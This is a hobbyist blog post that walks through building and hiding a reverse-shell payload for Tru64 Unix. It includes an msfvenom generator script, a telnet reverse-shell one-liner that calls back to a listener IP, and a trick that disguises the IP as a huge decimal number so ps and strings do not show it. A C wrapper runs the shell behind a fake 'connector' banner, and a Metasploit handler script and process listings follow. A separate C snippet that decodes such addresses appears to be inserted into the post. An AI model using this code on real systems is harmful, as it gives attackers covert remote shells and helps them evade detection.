I decided to check once again which of the current msfvenom payload options could be suitable for Tru64 Unix, and confirmed that only cmd/unix/reverse works reliably enough on this platform.
Some years ago I experimented a little with this, and here I want to share some interesting findings.
So, dusting off the old ways, I created a simple script that generates a shell script for the Tru64 cmd/unix/reverse payload via msfvenom:
```bash
#!/bin/bash
echo -e "What IP are we gonna use ? \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
# generate the cmd/unix/reverse one-liner for the given listener and make it executable
./msfvenom -p cmd/unix/reverse LHOST="$IP" LPORT="$port" EXITFUNC=thread > default.exe
chmod +x default.exe; ls -la default.exe
echo "Done..."
```
What the above script produces is the following code (the IP address is in my lab):
```sh
sh -c '(sleep 9000|telnet 192.168.11.2 9000|while : ; do sh && break; done 2>&1|telnet 192.168.11.2 9000 >/dev/null 2>&1 &)'
```
This works fine if you execute it on a Tru64 system that can reach 192.168.11.2: you get your reverse shell and can do whatever you need.
But I did not like the plain-text IP address in the script and decided to investigate how we can obfuscate it, so the first thing that came to mind was to create a simple C program and call the above command from it.
If you decide to use a primitive and unsafe system() call in C like this, for example:
```c
system("sh -c '(sleep 9000|telnet 192.168.11.2 9000|while : ; do sh && break; done 2>&1|telnet 192.168.11.2 9000 >/dev/null 2>&1 &)'");
```
The compiled C program will of course run just fine, but the ps process list will still show the telnet 192.168.11.2 connection, and the strings command will reveal the address in the compiled binary.
In order to obfuscate the IP address we can use an old trick: convert the IP address to its decimal value.
An IPv4 address is written in dotted octet notation. Each octet is expressed as a decimal value from 0 to 255; since computers start counting from zero, this gives us 256 possible values for each octet. Each octet value represents its binary equivalent.
Calculating the decimal value of an IPv4 address is easy. If we number the octets from left to right and call them $octet1, $octet2, $octet3 and $octet4, we can use the following formulas to convert each octet into its decimal weight and then add the four results to obtain the decimal equivalent of the IP address:
```text
$octet1 x (256^3) = $decimal1
$octet2 x (256^2) = $decimal2
$octet3 x (256)   = $decimal3
$octet4           = $decimal4
$decimal1 + $decimal2 + $decimal3 + $decimal4 = $decimal_equivalent
```
For example, converting the IP address 192.168.11.2 to its decimal equivalent looks like this:
```text
192 x (256^3) = 3221225472
168 x (256^2) = 11010048
 11 x 256     = 2816
  2           = 2
3221225472 + 11010048 + 2816 + 2 = 3232238338
```
The decimal equivalent of 192.168.11.2 is 3232238338.
This value 3232238338 can now be pinged and ssh'd to from a normal system like so:
```text
user@X201:~ > ping 3232238338
PING 3232238338 (192.168.11.2) 56(84) bytes of data.
64 bytes from 192.168.11.2: icmp_seq=1 ttl=64 time=66.1 ms
64 bytes from 192.168.11.2: icmp_seq=2 ttl=64 time=88.5 ms
^C
--- 3232238338 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 66.164/77.332/88.500/11.168 ms
```
On modern systems (Linux 64-bit / Windows 8/10 64-bit) you cannot use a decimal IP value higher than 4294967295 (2^32 - 1):
```text
user@X201:~ > ping 4294967295
Do you want to ping broadcast? Then -b
user@X201:~ > ping 4294967296
ping: unknown host 4294967296
```
But not so on old commercial UNIXes :) On Tru64, for example, you can go way over the 4294967295 limit with your decimal value and the system will somehow still work out the IP address just fine.
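As an added example (not code from the original post), here is the octet arithmetic above and the 4294967295 limit on a modern libc, in C: dotted_to_decimal applies the post's formula, and normalize_host_literal hands a numeric host literal to the local inet_aton, the same parser ping and telnet use, and renders what it resolved to. That second function is also the quickest way to turn such a literal found in a process listing back into a readable address when reviewing a box. The function names are mine; the long Tru64 value is copied from the post.

```c
#define _DEFAULT_SOURCE 1   /* expose inet_aton in glibc headers */
#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

int inet_aton(const char *cp, struct in_addr *inp); /* explicit prototype in case strict feature macros hide it */

/* The value the post reports Tru64 resolving to 192.168.11.2 (copied from the post). */
static const char TRU64_VALUE[] = "323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002";

/* The post's formula: octet1*256^3 + octet2*256^2 + octet3*256 + octet4.
 * Returns 0 and stores the result in *out, or -1 if the input is not a dotted quad. */
int dotted_to_decimal(const char *dotted, uint32_t *out)
{
    unsigned o[4];
    char tail;
    if (sscanf(dotted, "%u.%u.%u.%u%c", &o[0], &o[1], &o[2], &o[3], &tail) != 4)
        return -1;
    for (int i = 0; i < 4; i++)
        if (o[i] > 255)
            return -1;
    *out = o[0] * 16777216u + o[1] * 65536u + o[2] * 256u + o[3];
    return 0;
}

/* Hand a numeric host literal to the local libc (inet_aton) and render the accepted
 * address as a dotted quad. Returns 0 and fills buf, or -1 if libc refuses the literal.
 * glibc rejects anything above 4294967295; the post reports Tru64 accepts far longer numbers. */
int normalize_host_literal(const char *literal, char *buf, size_t buflen)
{
    struct in_addr a;
    if (!inet_aton(literal, &a))
        return -1;
    return inet_ntop(AF_INET, &a, buf, (socklen_t)buflen) ? 0 : -1;
}

int main(void)
{
    const char *samples[] = { "3232238338", "4294967295", "4294967296", TRU64_VALUE };
    char buf[INET_ADDRSTRLEN];
    uint32_t v;
    if (dotted_to_decimal("192.168.11.2", &v) == 0)
        printf("192.168.11.2 -> %u\n", v);   /* prints 3232238338 */
    for (size_t i = 0; i < sizeof samples / sizeof *samples; i++)
        printf("%.20s%s -> %s\n", samples[i], strlen(samples[i]) > 20 ? "..." : "",
               normalize_host_literal(samples[i], buf, sizeof buf) == 0 ? buf : "rejected by this libc");
    return 0;
}
```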
So I played a little with the numbers and came up with the following monster decimal value, which equals 192.168.11.2 on Tru64:
323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002
For Tru64 (emulated on emuvm, not a physical box) anything higher than this will coredump the telnet session, so this is a safe value that I have tested to get a reverse connection to the Metasploit listener.
Here is my lame C source code for the Tru64 payload executable:
```c
#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>
#include <errno.h>
#include <dirent.h>

int main(void)
{
    system("/usr/bin/clear");
    printf("[*] Starting the Metasploit Framework connector for Tru64 ");
    system("/sbin/sleep 1"); printf("."); fflush(stdout);
    system("/sbin/sleep 1"); printf(".."); fflush(stdout);
    system("/sbin/sleep 1"); printf("..."); fflush(stdout);
    system("/sbin/sleep 1"); printf("...."); fflush(stdout);
    printf("\n[*] Connecting to target");
    printf("\n[*] Using the decimal number trick to obfuscate the IP");
    printf("\n[*] In this example it is the following value that passes for IP 192.168.11.2");
    printf("\n-----------------------------------------------------------------------------");
    printf("\n32322357823232235782323223578232322357823232235782323223578232322357823232235");
    printf("\n78232301116894100023223578232301111232235782323011123223578232301112322357823");
    printf("\n23011123223578232301112322357667040002");
    system("/sbin/sleep 1");
    fflush(stdout);
    /* the msfvenom cmd/unix/reverse one-liner, with the decimal value in place of the dotted IP */
    system("/sbin/sh -c '(/sbin/sleep 9000| /usr/bin/telnet 323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002 9000|while : ; do /sbin/sh && break; done 2>&1| /usr/bin/telnet 323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002 9000 > /dev/null 2>&1 &)'");
    printf("\n[*] Executing the payload ");
    system("/sbin/sleep 1"); printf("."); fflush(stdout);
    system("/sbin/sleep 1"); printf(".."); fflush(stdout);
    system("/sbin/sleep 1"); printf("..."); fflush(stdout);
    printf("\nChecking the telnet process in ps tree\n");
    system("/sbin/ps -ef | grep /usr/bin/telnet");
    return 0;
}
```
Compilation is done with cc on Tru64 like so:
```sh
cc file.c -o file.exe
```
And the Metasploit listener shell script looks like this:
```bash
#!/bin/bash
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
# build a one-shot msfconsole command that starts the multi/handler for cmd/unix/reverse
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD cmd/unix/reverse ; set LHOST ' > run.listener.sh
echo -n "$host" >> run.listener.sh
echo -n '; set LPORT ' >> run.listener.sh
echo -n "$port" >> run.listener.sh
echo -n '; run"' >> run.listener.sh
chmod +x run.listener.sh
./run.listener.sh
```
Once executed on Tru64, the connection is established on your listener and you get a really strange looking telnet call in the ps tree list:
```text
root   921     1  0.0 20:55:11 ??       0:03.43 /usr/opt/java131/bin/../bin/alpha/native_threads/java -classic -mx2m -Dos.version=boot authentication.server.AuthenticationServer
root   948     1  0.0 20:55:15 ??       0:05.74 /usr/sbin/smsd -d
root   989     1  0.0 20:56:04 ??       1:44.99 Xvnc :1 -desktop X -httpd /usr/local/vnc/classes -auth /home/root/.Xauthority -geometry 1024x700 -depth 16 -rfbwait 120000 -rfbauth /home/root/.vnc/passwd -rfbport 5901
root   992     1  0.0 20:56:08 ??       0:00.80 /usr/dt/bin/dtsession
root  1020     1  0.0 20:56:11 ??       0:00.19 /usr/dt/bin/ttsession -s
root  1021   810  0.0 20:56:11 ??       0:00.39 rpc.ttdbserverd
root  1029   992  0.0 20:56:14 ??       0:06.24 dtwm
root  1030   992  0.0 20:56:17 ??       0:00.52 /usr/bin/X11/dxconsole
root  1031   992  0.0 20:56:17 ??       0:01.81 dtfile -session dtHppbgQ
root  1033  1031  0.0 20:56:35 ??       0:00.00 dtfile -session dtHppbgQ
root  1039  1031  0.0 20:56:43 ??       0:00.17 /usr/dt/bin/dtexec -open 0 -ttprocid 3.1OqjRR 01 1020 1342177279 1 1 0 10.0.2.10 4_102_1 xterm -bg black -fg green
root  1040  1039  0.0 20:56:43 ??       0:04.76 xterm -bg black -fg green
root  1256  1031  0.0 21:45:00 ??       0:00.17 /usr/dt/bin/dtexec -open 0 -ttprocid 3.1OqjRR 01 1020 1342177279 1 1 0 10.0.2.10 4_104_1 xterm -bg black -fg green
root  1257  1256  0.0 21:45:00 ??       0:00.63 xterm -bg black -fg green
root  1495     1  0.0 22:27:21 ??       0:00.02 /sbin/sleep 9000
root  1520     1  0.0 22:41:41 console  0:00.05 /usr/sbin/getty console console vt100
root  1041  1040  0.0 20:56:44 pts/1    0:05.26 -csh (tcsh)
root  1323     1  0.0 21:52:01 pts/1    0:00.02 /sbin/sleep 9000
root  1395     1  0.0 22:05:35 pts/1    0:00.02 /sbin/sleep 9000
root  1551     1  0.0 23:05:06 pts/1    0:00.03 /usr/bin/telnet 323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002 9000
root  1552  1551  0.0 23:05:06 pts/1    0:00.02 /sbin/sleep 9000
root  1553  1551  0.0 23:05:06 pts/1    0:00.02 /usr/bin/telnet 323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002 9000
root  1554  1551  0.0 23:05:06 pts/1    0:00.00 /sbin/sh -c (/sbin/sleep 9000| /usr/bin/telnet 323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002 9000|while : ; do /sbin/sh && break; done 2>&1| /usr/bin/telnet 323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002 9000 > /dev/null 2>&1 &)
root  1555  1554  0.0 23:05:07 pts/1    0:00.01 /sbin/sh
root  1561  1555  0.0 23:05:30 pts/1    0:00.14 ps -ef
root  1258  1257  0.0 21:45:00 pts/2    0:00.29 -csh (tcsh)
root  1285     1  0.0 21:47:18 pts/2    0:00.02 /sbin/sleep 9000
```
This IP trick works on AIX and Tru64; Solaris is not affected by it. I have not had a chance yet to verify HP-UX, but I bet it will work there too.
And of course some movie in the end to check how it works in real life
And an audio equivalent would be this
P.S
Greetings to Markus (you know who you are) for the Alpha VMS and Tru64 inspiration many years ago !
P.P.S
Rotten dried fish that Sasha was eating, and the flying nails when he was clipping ’em brings back nice memories :)
P.P.P.S
Fuqz go to Ron, Luigi, Aram, John and the biggest fucker BILL ! (you know who you are)